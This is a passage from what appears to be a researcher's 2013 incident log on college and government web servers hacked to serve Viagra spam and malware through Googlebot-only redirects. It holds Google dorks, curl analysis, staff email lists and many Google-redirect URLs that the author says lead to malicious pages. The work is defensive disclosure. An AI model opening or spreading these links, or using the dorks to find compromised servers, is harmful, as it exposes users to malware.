Covert Abuse of College Servers

Directory

1. Executive summary (11-9-13)
2. Detailed analysis (11-9-13)
3. Further analysis of BYU.EDU (11-18-13)
4. Progress at Chatham and BYU (11-19-13)
5. Nineteen More Infected Colleges (11-20-13)
6. 39 More Infected Sites (11-21-13)
7. Eight More Sites (11-21-13)
8. Removal Tips from KWC (11-21-13)
9. Removal Tips from UARK (11-21-13)
10. Conflicting reports about botnet behavior (11-22-13)
11. Finding Local Businesses (11-22-13)
12. Links to helpful resources (11-23-13)
13. UK infected colleges (11-25-13)
14. Misc. infected sites (11-25-13)
15. NZ infected colleges (11-25-13)
16. AU infected colleges (11-25-13)
17. More Notifications (11-25-13)
18. Top "Buy Viagra" Hits (11-27-13)
19. More inside information and Base64-encoded data (11-29-13)
20. More Top Hits (11-30-13)
21. .GOV Sites (12-12-13)


1. Executive Summary

The web server for Kentucky Wesleyan College has been hacked, and has been used for at least the last two weeks to serve malware pages and to sell illegal drugs.

I have not identified the attackers, but they used a domain (SECUREDATA24.COM) registered in Hong Kong and a relay server in Amsterdam, so they seem pretty well-hidden. That domain is not currently on blacklists, but it should certainly be added to them immediately.

This infection is also quite subtle, and would not be easily detected by students or staff of the college. As far as I can tell, the malware is not delivered to people who use the website normally.

However, since the attacker was able to insert malware into several pages at KWC, and to insert a 302 redirect into the Apache configuration, they have a large incident response obligation now.

I highly recommend that KWC hire a security consultant to analyze their systems, to determine how the attack was done, and how much damage was done. They may be subject to legal notification requirements if personal data or health-related information was exposed.

More Infected Servers

Using the same method, I found these other colleges infected the same way: Click here for details of my tests. I sent notifications to them on Nov. 10, 2013: UTS, BYU, TSU, : Still infected 6 pm 11-12-13; still infected 11-14-13
UTS, BYU, TSU, Chatham still infected 11-16-13
KWC: Fixed 6 pm 11-12-13

More notifications:


2. Detailed Analysis

Warning: The pages I am examining here contain malware, so if you try this yourself, be careful!

Google Dorks

I was using Google dorks to find security problems at colleges, and I came across this one:
inurl:edu viagra-online-100mg
As you can see, there are 1.8 million hits:

Dependence on User-Agent

I examined a few of them, finding a variety of exploitation techniques, but this one was different:

Clicking one of the hits in Google redirects to this page:

However, copying and pasting the URL leads to a clean page:

The Google cache shows the defacement:

I changed my User Agent to the Googlebot and saw the same thing.

This is clever, and I imagine it's a good way to persist on a server for a long time. Real links used by students and staff go to clean pages, but people coming in from Google get redirected to malicious sites.

Chrome Developer Tools

Chrome developer tools shows that the page has a 302 redirect right at the start:

Curl

I used this command from the Mac OS X Terminal to fetch the clean page:
curl http://www.kwc.edu > kwc-normal.htm
Here's how that site's source code looks. Notice the small setCookie and getCookie functions:

Then I fetched the infected page:

curl -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://www.kwc.edu > kwc-google.htm
The dirty one shows the infection in its source code:

I noticed these items:

Mawords Hash

<!-- d90fd6da5bb59c807b28b07724dc0506 -->

This appears to be a hash that identifies the website.

Googling it shows this interesting hit:

I don't know what mawords is; but I decided not to investigate it further right now.

CSS Position

<style>
.8tolyqpt	{
	position:absolute; left:4000px;
}
</style>
This conceals the injected code by placing it 4000 pixels to the right, which I tested using this page:

http://www.w3schools.com/cssref/tryit.asp?filename=trycss_position_relative

However, the way this code is inserted, inside a for loop in a function in the head, I don't think it will ever be rendered.

I think its purpose is to feed the Googlebot keywords about Viagra, so people shopping for Viagra will find this page.

Using Wireshark

I tried to download the page leading to the infection with curl, but was unsuccessful.

And my Avast antivirus was blocking the page now.

So I moved to a Kali Linux virtual machine, turned off Avast, and ran Wireshark while loading the page from the Google hits to get the whole story.

It's very simple. The Google link fetches the KWC page, but the infected server returns a 302 redirect to a securedata24.com link:

I googled that domain, and it is apparently not known as a malware host:

So I turned my antivirus back on and tried to go there, but it seems to have no Website.

Here are some more links showing information about it. It's an 8-month-old domain in Amsterdam that does not seem to have been used to host any real website.

http://domainagecheck.com/domain/securedata24.com

Securedata24.com may not be a known malware host, but it's sure serving up malware now.

Whois shows that it's registered from Hong Kong. Here's the Whois output with everything boring removed.

Notice the email addresses--this looks like an automatically generated domain, to be used temporarily by malware.

$ whois securedata24.com

   Domain Name: SECUREDATA24.COM
   Registrar: ONLINENIC, INC.
   Whois Server: whois.onlinenic.com
   Referral URL: http://www.OnlineNIC.com
   Name Server: NS1.DNS-DIY.NET
   Name Server: NS2.DNS-DIY.NET
   Status: clientTransferProhibited
   Updated Date: 01-apr-2013
   Creation Date: 01-apr-2013
   Expiration Date: 01-apr-2014

Domain Name:securedata24.com
Record created:4/1/2013
Record expired:04/01/2014

Domain servers in listed order:
	 ns1.dns-diy.net 	 ns2.dns-diy.net

Administrat:
   name-- Domain ID Shield Service
   org-- Domain ID Shield Service CO., Limited
   country-- CN
   province-- Hong Kong
   city-- Hong Kong
   address-- Room 510-511A2 Nan Fung Tower., 173 Des Voeux Road C., Hong Kong
   postalcode-- 999077
   telephone-- +852.21581835
   fax-- +852.30197491
   E-mail-- se4944887232201@domainidshield.com
Technical Contact:
   E-mail-- se4944887232202@domainidshield.com
Billing Contact:
   E-mail-- se4944887101103@domainidshield.com
Registrant Contact:
   E-mail-- se4944887101104@domainidshield.com

How Long has KWC Been Infected?

I looked in Google's cache, and I found an infected page from Oct 27, 2013--almost two weeks ago.

Ethics

I decided to notify KWC. I don't see any reason to be secret about it, or to wait for them to fix it.

Their infected servers are being used now to serve malware and sell illegal drugs, and everyone can easily see it on Google searches.

I know from previous experience that some people in the security community will say I am not practicing "responsible disclosure" by publishing this immediately, but I don't agree.

The reasons to delay publication of a security finding are:

What I have here is a vulnerable website that has already been hacked, and which is being used to harm people now.

If KWC fixes it immediately, that's good. But what is the security benefit to anyone in concealing it?

If people think I am wrong, feel free to Tweet me @sambowne

Notification

KWC has no Infosec professors, no Infosec classes, and no contact email at all except admissions@kwc.edu, as far as I can tell.

I also could not find any information on how to report security incidents or how to contact the webmaster.

This situation makes them a logical target for the criminals who are using their systems, and it gives me very little hope that contacting them will do much good.

Nevertheless, I sent this email today, to admissions@kwc.edu, abuse@kwc.edu, and security@kwc.edu.

I also sent it to their Twitter account, which seems active, @kywesleyan.

Hello:

I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.

Your web server has been hacked, and is being used to sell illegal drugs and to deliver malware.

To see the infection, simply google "inurl:kwc.edu viagra-online-100mg" (without the quotation marks) and click any link. I recommend using a Mac or Linux machine to perform this test because the pages that open contain malware.

I strongly recommend that you alert your webmaster, and engage the services of a web security consultant. There is quite a lot of work to be done to repair the damage, fix the vulnerabilities that caused this, and determine if your students or staff have been harmed.

Details are here: http://samsclass.info/125/proj11/subtle-infect.htm

Feel free to contact me if I can be of assistance.


3. Further analysis of BYU.EDU

I noticed when attempting to demonstrate the BYU infection that it sometimes fails to appear. Searching for it on my iPad led to links that looked the same, but did not redirect to the malicious sites. At first, I thought this was the malware being even more clever, but I now think it's just a difference in how Google works on iPads.

After several tests, I found a URL that makes analysis easy from any device. This is the URL Google creates when a search is performed in Chrome on a MacBook Air, with all HTTPS protocols replaced by HTTP, to make sniffing easier.

I'm not linking to it, but if you copy and paste this, it works both the Macbook Air and the iPad:

http://www.google.com/url?sa=t&rct=j&q=inurl%3Abyu.edu%20viagra-online-100mg&source=web&cd=1&ved=0CCsQFjAA&url=http%3A%2F%2Fstore.moa.byu.edu%2Flet-the-children-come-unto-me-4.html%3Fc3rvc%3D484823&ei=3G-KUpaBOqH9iwKns4DABA&usg=AFQjCNHOcrDAehTNn04aaawyLtR74fH0-g&sig2=ILvHfQ3hM5ac5mEzxgXOwA&bvm=bv.56643336,d.cGE
Visiting that link shows this page, a warning from Google:

Here's the TCP conversation from Wireshark.

Clicking the link goes to a malicious site. Here's the important TCP conversation, asking for a page about art on the BYU.EDU server, but returning a 302 redirect to the malicious server securedata24.com:

For future reference, here are handy URLs to use to see the infections at other colleges:

TSU:

http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fcost.tsu.edu%2FWebPages%2FNews.php%3FIndex%3D79%26y29zd%3D516464&ei=LoeKUpLWGcipiAKFqYH4Cw&usg=AFQjCNFpEj2OtWBmIffLAlpUmlcz_6VvtA&sig2=jFkx4c8JV4ipWCsboh6P2g&bvm=bv.56643336,d.cGE
UTS:
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCwQFjAA&url=http%3A%2F%2Fjournals.uts.edu%2Fvolume-x-2009%2F345-heavenly-mother.html%3Fam91c%3D580274&ei=dIeKUuLRA6WUiAL_ioHgCA&usg=AFQjCNFRtTIgxgHX1tzigDQW8KF0K3AAzQ&sig2=uh9NB_CAM6FKzlkNfSmKfQ&bvm=bv.56643336,d.cGE
Here's a link to the simpler infection at Chatham:

http://blogs.chatham.edu/wp-content.bak/plugins/social/OTAwOQ-3D-3D.asp%C3%A2%E2%82%AC%C5%BD

Using them, I verified that all four sites are still infected on 11-18-13.

4. Progress at Chatham and BYU

I found more promising Twitter accounts to use: @BYU, @TexasSouthern, and @UTS_AU_Blog. BYU replied immediately and said they would pass it along to the right people.

Chatham Fixed It!

I just got a friendly email from someone at Chatham (11-19-13), and they deleted the hacked pages. Good to see!

BYU, TSU, and UTS are still infected at 3:13 pm on 11-19-13.

5. Nineteen More Infected Colleges

Update 12-4-13: These are the five colleges that currently have clean servers: @UofAlabama, @UCBerkeley, @WaylandBaptist, @vtnews, @UArkansas.

Repair Timeline

11/20/13 6:00 am All 19 infected
11/20/13 2:10 pm7 cleaned, 12 still infected
11/21/13 3:50 pm5 cleaned, 14 still infected (3 cleaned changed to infected, one infected changed to cleaned)
12/2/13 6:00 am6 cleaned, 13 still infected
12/4/13 6:12 am5 cleaned, 14 still infected

Interesting cases

KWC: 6 of the first ten hits for "site:kwc.edu buy viagra" are still infected. The original reported link was fixed but came back.

DAVIDSON: 9 of the first ten hits for "site:DAVIDSON.EDU online canadian pharmacy" are infected. The original reported link was fixed but came back.

UCSC: All of the first ten hits for "site:ucsc.edu viagra" are infected. The reported link was fixed, but came back the next day. Santa Cruz is nearby--I'd love to visit and see this thing from the inside. I want to find the best way to clean it, and get malware samples so we an recognize it and get it added to antivirus databases, if appropriate.

NCSU: 9 of the first ten hits for "site:ncsu.edu drug prices" are infected. The reported link was fixed, but came back the next day.

12-4-13 6:12 am testing; all unchanged except 16 is now re-infected

I used this Google search:

inurl:edu intitle:viagra
Here are the colleges that were infected, as of 9 am 11-20-13, with URLs that go to malicious pages (don't load them on an unprotected system).

Some of these are duplicates of infections I found previously, but I decided to include them all and try again to notify them, since clearly nothing has yet been fixed.

Infected on 11-29-13:
http://ot.ncsu.edu/in-usa-levitra-generic/

College Emails Malicious URL
1. UA.EDU
Alabama
@UofAlabama
community.affairs@ua.edu
dlamb@fa.ua.edu
mbownes@uasystem.ua.edu
pdunn@uasystem.ua.edu

Fixed at 2:10 PM 11-20-13!

Fixed when tested on 11-21-13 & 12-2-13

dateline.ua.edu/viagra-online-san-marino
2. KWC.EDU
Kentucky
debbiebe@kwc.edu
kpayne@kwc.edu
admissions@kwc.edu
krutherman@kwc.edu
jkuhlman@kwc.edu

Fixed when tested on 11-21-13
Infected again 12-2-13
Fixed on 7-19-14

http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFEQFjADOAo&url=http%3A%2F%2Fwww.kwc.edu%2Fpage.php%3Fpage%3D1135%26a3djl%3D983496&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEiL4qQXQCr2r1e3A_WyyBLyQd_oA&sig2=NZKJE8w7An68ASRJ1c5oOw&bvm=bv.56643336,d.cGE
3. WWW.COLBYCC.EDU
Kansas
george.mcnulty@colbycc.edu
pat.erickson@colbycc.edu
gregory.nichols@colbycc.edu
debbie.schwanke@colbycc.edu

Still infected on 11-21-13 & 12-2-13
Fixed on 7-19-14

http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CFoQFjAEOAo&url=http%3A%2F%2Fwww.colbycc.edu%2F%3Fy29sy%3D393622&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEMa4eororLMbHVZWEEDXbEuRtL6w&sig2=KAmjrkyaLDsx4kbYnVhnxA&bvm=bv.56643336,d.cGE‎
4. PARSONS.EDU
New York
BrinkmaG@newschool.edu
ByfieldT@newschool.edu
chacina@newschool.edu
thinkparsons@newschool.edu
thinkparsonsgrad@newschool.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CHMQFjAHOAo&url=http%3A%2F%2Fpetlab.parsons.edu%2Famd%2Ftop-selling-herbal-viagra%2F&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEy90ifx_7mMfJ8-33q1BtvsgMIlw&sig2=GsyEvUhGOgLBmOjkRet1Rg&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CC0QFjAC&url=http%3A%2F%2Fwnsr.parsons.edu%2F%3Fzti%3D92-kamagra%2Ba%2Bviagra&ei=InzKU8abGIa-sQTVxIHIDw&usg=AFQjCNGW-0kATQ4oouMWjJsdIzHjforOkw&sig2=IoKpU7newDY1mNjtUSC5YQ

5. BERKELEY.EDU
California
@UCBerkeley
andypino@berkeley.edu
rsanders@berkeley.edu
CHANCELLOR@BERKELEY.EDU
AUDIT@BERKELEY.EDU

Fixed at 2:10 PM 11-20-13!

Fixed when tested on 11-21-13 & 12-2-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=30&ved=0CHEQFjAJOBQ&url=http%3A%2F%2Fchl.berkeley.edu%2F2010%2F7%2Fpost2614%2Fgenerika-viagra-cialis&ei=h-6MUs2HMeWJiALw54GYBA&usg=AFQjCNHcFI6QMWqu9HavksN9ZJxDX2XxSw&sig2=AY8Em7IGIrVOcovf31xXgA&bvm=bv.56643336,d.cGE
6. DAVIDSON.EDU
North Carolina
president@davidson.edu
raramanujan@davidson.edu
tichartier@davidson.edu
edkania@davidson.edu

Fixed at 2:10 PM 11-20-13!

Infected again on 11-21-13; still infected 12-2-13
Fixed on 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=35&ved=0CEwQFjAEOB4&url=http%3A%2F%2Fdavidsonjournal.davidson.edu%2Findex.php%2Forder-discount-viagra-online%2F&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNFDRXMeEhVChigdkrC195RjUjoqDA&sig2=pXpBFiT855lPJlspneGhag&bvm=bv.56643336,d.cGE
7. WCU.EDU
North Carolina
webmaster@wcu.edu
wkbrenton@wcu.edu
lgaetano@email.wcu.edu
cfowler@email.wcu.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGwQFjAIOB4&url=http%3A%2F%2Fsandbox.wcu.edu%2Fthisweek%2Fincludes%2Finc.php%3Fp%3Dcialis-viagra-combination&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNEW9BZ2mWPOB43LBWF4OuL21Jsn2Q&sig2=MXCEs5aOsizDlC4mgDcXtQ&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CB8QFjAA&url=http%3A%2F%2Fdoitnews.wcu.edu%2Fviagra-saw%2F&ei=wHzKU5KMAq7lsASYrID4DA&usg=AFQjCNEzTdSjHdgT7GyXNkzJ8OspRF9xJw&sig2=nhB2S1bQP-oydGE7A824Fg

8. UTS.EDU
New York
None

Still infected on 11-21-13 & 12-2-13
Fixed on 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHMQFjAJOB4&url=http%3A%2F%2Fwww.journals.uts.edu%2Fvolume-vi-2004-2005%2F%3Fam91c%3D262389&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNGcE9zwkt03RPPgYdeHQGowq9Fwwg&sig2=0Y4BGf3Oo6bE59dziYdZKQ&bvm=bv.56643336,d.cGE
9. TSU.EDU
Texas
rudleyjm@TSU.EDU
Griffin_ka@TSU.EDU
yu_lx@tsu.edu
yu_lx@tsu.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CCsQFjAAOCg&url=http%3A%2F%2Ftransportation.tsu.edu%2FTrans_Server%2FCTTR4TransportationServ%2Fwww.tsu.edu%2Fcore%2Fmanager%2Fpagemgrcontrolled%2Fpagepreviewa1b5.html%3Fdhjhb%3D659796&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNEzQ1LWShwoZdS9bWWrBCI2rqY_mA&sig2=UAXm8ivGAqOeLck7qOub6w&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CCcQFjAB&url=http%3A%2F%2Ftransportation.tsu.edu%2Fonline-viagra%2F&ei=RH3KU5uLJ9PmsASNyIC4BQ&usg=AFQjCNESVgwE_-0xUdp745WpN5WWg7bvJw&sig2=NieSm9AXMYXXoUo7mRpmaA

10. WWCC.EDU
Washington
steven.vanausdle@wwcc.edu
i.ramsey@wwcc.edu
wendy.samitore@wwcc.edu
webmaster@wwcc.edu
general@wwcc.edu

Still infected on 11-21-13 & 12-2-13
Fixed on 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=42&ved=0CDMQFjABOCg&url=http%3A%2F%2Fwww.wwcc.edu%2FCMS%2F%3Fid%3D835%26d3djy%3D424667&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNH3lPzl2i_UxOxJ-KX8GLlFD3ehOg&sig2=eLp2d_CKlugzm2AKKNkf5Q&bvm=bv.56643336,d.cGE
11. NMSU.EDU
New Mexico
ckottong@nmsu.edu
audit@nmsu.edu
ovprweb@nmsu.edu
hamid@nmsu.edu
abuse@nmsu.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=43&ved=0CD8QFjACOCg&url=http%3A%2F%2Fchss.nmsu.edu%2Fprospective-students%2Fvisit-our-college%2F%3Fy2hzc%3D725794&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNFx77pUP7lp83FUoOcRg7vO9gaivA&sig2=kyQaW-1TG4jdFlvHqmVkDA&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CEQQFjAE&url=http%3A%2F%2Fwww.cs.nmsu.edu%2FALP%2F%3Fsildenafil-order&ei=oX3KU5arL8fksASbu4H4Cw&usg=AFQjCNFxCe5vfg5TgvR1Wc0s0TsmCv7I1Q&sig2=JLSO_XrLX_tj8Ozo1okrQA

12. WBU.EDU
Texas
@WaylandBaptist
webmaster@wbu.edu
armesp@wbu.edu
lezlieh@wbu.edu
vhart@wbu.edu

Still infected on 11-21-13
Fixed 12-2-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=44&ved=0CEcQFjADOCg&url=http%3A%2F%2Fwww.wbu.edu%2Flog%2F&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNGa6pq_p4K5RnHVlADKZZ7_MmlB4Q&sig2=duTiMSV_HHvyn4jOZQmzGw&bvm=bv.56643336,d.cGE
13. UCSC.EDU
California
help@ucsc.edu
chancellor@ucsc.edu
mdoyle1@ucsc.edu
yiz@soe.ucsc.edu

Fixed at 2:10 PM 11-20-13!

Infected again on 11-21-13 & 12-2-13
Fixed on 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=45&ved=0CE4QFjAEOCg&url=http%3A%2F%2Fpromweek.soe.ucsc.edu%2F%3Fp%3D1594&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNE10sG-np9zjvxKNCwSuoYSum43RQ&sig2=CJ2ShwPqc65tupSuhtP9hQ&bvm=bv.56643336,d.cGE
14. VT.EDU
Virginia Tech
@vtnews
president@vt.edu
rittenfa@vt.edu
gscales@vt.edu
lhaugh@vt.edu

Fixed at 2:10 PM 11-20-13!

Fixed when tested on 11-21-13 & 12-2-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=49&ved=0CGwQFjAIOCg&url=http%3A%2F%2Fdendro.cnre.vt.edu%2Fdoctor%2Fgeneric-viagra-india%2F&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNG7gtb95z5zjjqG4gpnKRW3M_2pDw&sig2=kEw8sKJTDhFvTQsJ0UNy-Q&bvm=bv.56643336,d.cGE
15. UARK.EDU
Arkansas
@UArkansas
chancell@uark.edu
rhudson@uark.edu
dandrews@uark.edu
sleeds@uark.edu

Fixed at 2:10 PM 11-20-13!

Fixed when tested on 11-21-13 & 12-2-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=50&ved=0CHMQFjAJOCg&url=http%3A%2F%2Frgis.cast.uark.edu%2Findex.php%3Fq%3Dviagra-ghana&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNEOAX85AJw40JaupfamewRUHoR4LA&sig2=iQHQE1WuAXjzQ-RBe2RgUA&bvm=bv.56643336,d.cGE
16. SFASU.EDU
Texas
jstandley@sfasu.edu
liasrr@sfasu.edu
taylorj1@sfasu.edu
jljohnstone@sfasu.edu
controller@sfasu.edu

Still infected on 11-21-13
Fixed 12-2-13
Re-infected 12-4-13; still infected on 7-19-14

cte.sfasu.edu/course/?pitemx=473

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDIQFjAA&url=http%3A%2F%2Fforestry.sfasu.edu%2Findex.php%3Fnew%3D197909%26luom%3D2825%3Ftitle%3Dpriser-viagra&ei=KX7KU5_GK_PfsATV1YDoCg&usg=AFQjCNGd5ZjDsGaLkc6h0Ud3PyKpRSfeLA&sig2=w-m86ofnvUD8JAqSSjyUNw

17. ISI.EDU
California
pnataraj@isi.edu
jtw@isi.edu
carl@isi.edu
vcomms@usc.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=66&ved=0CFYQFjAFODw&url=http%3A%2F%2Fwww.lsi.edu%2Fblog%2Fwp-content%2Fuploads%2F2008%2F10%2F%3Fvan%3Dads-for-viagra%26go%3D1&ei=TPGMUvSkMOTEigL24AE&usg=AFQjCNHvVBr3jM59GoRyzIhoUOcDEr4oNw&sig2=6jR-t1WaK5VKg9lmrCy9lQ&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&ved=0CDoQFjAAOBQ&url=http%3A%2F%2Fdiw.isi.edu%2Fdis2012&ei=cH7KU7W3C4_nsATF9oCQDQ&usg=AFQjCNGv6b5EfQzCPrgAARB3pYsqyb54WQ&sig2=3RzDLbc2Z2JegjLbQeo0VA
View Source

18. NCSU.EDU
North Carolina
web_feedback@ncsu.edu
newstips@ncsu.edu
eileen_goldgeier@ncsu.edu
academic-student-affairs@ncsu.edu

Fixed at 2:10 PM 11-20-13!

Infected again on 11-21-13 & 12-2-13
Fixed on 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=88&ved=0CGAQFjAHOFA&url=http%3A%2F%2Femporium1.lib.ncsu.edu%2Fwolfram%2Fsounds%2F_css2.php%3Fp%3Dbuy-viagra-cialis-online&ei=jPGMUsgnqseKAuzQgIgM&usg=AFQjCNHsel9r1jcvxLie5H9cwISnUcbnFg&sig2=bgjyKXmv9HMPAq8jSaD2pg&bvm=bv.56643336,d.cGE
19. PARKLAND.EDU
Illinois
ABlackman@parkland.edu
MMobasseri@parkland.edu
admissions@parkland.edu
businessoffice@parkland.edu
plehn@parkland.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=92&ved=0CDEQFjABOFo&url=http%3A%2F%2Fvirtual.parkland.edu%2Flanguages%2Findex.php%3Fidpost%3D3762%26join%3Dvendo-viagra-alicante&ei=HvKMUpnkFMn8iwLH7ID4Cw&usg=AFQjCNHGjmguu4NdSLeJLdcQoIVzVQk-XA&sig2=luLY594arg4CrcL2sKNbTQ&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CCQQFjAB&url=http%3A%2F%2Fvirtual.parkland.edu%2Flanguages%2Findex.php%3Fidpost%3D2912&ei=UX_KU8DdEsrfsATW8ICoBA&usg=AFQjCNFASVuiVRGIWWVc7fNvSpSfp8MvOA&sig2=srCjn2s9faX5mYXKPGTXIw

Today, 11-20-13, I sent notices as listed above, like this:

Subject: You have been hacked

Hello:

I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.

Your web server has been hacked, and is being used to sell illegal drugs and to deliver malware.

To see the infection, open the link below. I recommend using a Mac or Linux machine to perform this test because the pages that open contain malware.

I strongly recommend that you alert your webmaster, and engage the services of a web security consultant. There is quite a lot of work to be done to repair the damage, fix the vulnerabilities that caused this, and determine if your students or staff have been harmed.

Details are here: http://samsclass.info/125/proj11/subtle-infect.htm

Feel free to contact me if I can be of assistance.


6. 39 More Infected Sites

I used these Google searches:
inurl:gov intitle:viagra
inurl:bank intitle:viagra
inurl:school intitle:viagra
intitle:news intitle:viagra intitle:sale
"viagra" intitle:Canadian "state college"
"viagra" intitle:Canadian "state university"
"viagra" intitle:Canadian intitle:"school of"
"viagra" intitle:Canadian intitle:"representative"
intitle:viagra intitle:Canadian council
inurl:school viagra canadian
intitle:viagra intitle:canadian Website designed and maintained by Fifth Ape Design
Since I got helpful responses from two of the colleges I notified yesterday, I changed my notification policy. I only notified the big-name schools on this list, hoping to get more good security researchers to join in so we can work together and figure this thing out. Hopefully we can post information that will be helpful to the smaller schools and organizations that have been hacked.

So I notified these schools this morning:

4. MIT.EDU
13. UCSC.EDU (the worst infection I have seen, apparently 2000 infected pages)
10. Youngstown State University
14. lyndonstate.edu
23. RUTGERS.EDU
Organization Emails Malicious URL
1. jamescitycountyva.gov
Virginia
webmaster@jamescitycountyva.gov
security@jamescitycountyva.gov
abuse@jamescitycountyva.gov

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CDQQFjABOB4&url=http%3A%2F%2Fwww.jamescitycountyva.gov%2Fonline-viagra%2F&ei=fDaNUs-oNbCQigLY5YGQCg&usg=AFQjCNGum7BrEgfm-MTUdqtWAOpKUwNK3Q&sig2=r2RrerQ90TJAEhAYnWgkkw&bvm=bv.56988011,d.cGE
2. winchester-in.gov
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CDYQFjAAOCg&url=http%3A%2F%2Fbuy-viagra.winchester-in.gov%2F937.html&ei=vzeNUpObMYPDigKxvYDADQ&usg=AFQjCNGTNFay1K9j6b7W9uI3HqhZ_pSQIQ&sig2=abdmXrXk_PDK9oSUEwxL9Q&bvm=bv.56988011,d.cGE
3. chambersburgpa.gov
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=60&ved=0CHsQFjAJODI&url=http%3A%2F%2Fwww.chambersburgpa.gov%2Foldwebsite%2F&ei=rTiNUqyRL-H8igKS2IC4Cw&usg=AFQjCNG95dpcGUdKYZzkuewl_rhlP0bKfQ&sig2=59F-5abksiA6MquCxtl8IA&bvm=bv.56988011,d.cGE
4. MIT.EDU
Massachusetts
http://ist.mit.edu/security/report
Reported 11-21-13
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CFsQFjAHOAo&url=http%3A%2F%2Fgroups.csail.mit.edu%2FEVO-DesignOpt%2Flebaronyearbook%2Fuploads%2Fstyle.php%3Fcap%3Dfirst-viagra-bank%26cc%3D1&ei=JDqNUrbGNeKaiQLhsYC4DQ&usg=AFQjCNHbFel8qG3ng2-65UjEaj3Sv8Q-WQ&sig2=z49trmHODzk0vNW1ED9UOA

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=65&ved=0CEkQFjAEODw&url=http%3A%2F%2Fgroups.csail.mit.edu%2FEVO-DesignOpt%2Flebaronyearbook%2Fuploads%2Fstyle.php%3Fcap%3Dviagra-school%26cc%3D1&ei=nD2NUob2O-TAigLoyIHAAg&usg=AFQjCNGtatR97iw6yL7pc3OF4Hq_vlRUgQ&sig2=sq2EJRyrM4Lc_nVIAmNxfg

Not notified yet:
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=34&ved=0CD8QFjADOB4&url=http%3A%2F%2Fgroups.csail.mit.edu%2FEVO-DesignOpt%2Fgegr%2Fuploads%2FGEGR%2F%3Ftak%3Dviagra-kaiser%26kt%3D2&ei=9EGOUoftFcj3iwLB_IDIDA&usg=AFQjCNE6iGnyF6l2ImIJIBQttTVv93Xx_Q&sig2=bWETcWcf2KtozulETURyFA

5. keystonescienceschool.org
Colorado
EReid@KeystoneScienceSchool.org
MNuttelman@KeystoneScienceSchool.org
DMiller@KeystoneScienceSchool.org
ASeidler@KeystoneScienceSchool.org

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CE0QFjAE&url=http%3A%2F%2Fkeystonescienceschool.org%2Fslides%2F%3Fm%3D948&ei=4jqNUpbVEqL0iQKizIGgAg&usg=AFQjCNGRTvFfSNMffBSjPLpzzgG68nVx7A&sig2=KRRxaLdF8fKMiR3SzJ0gnQ
6. al-imanschool.org
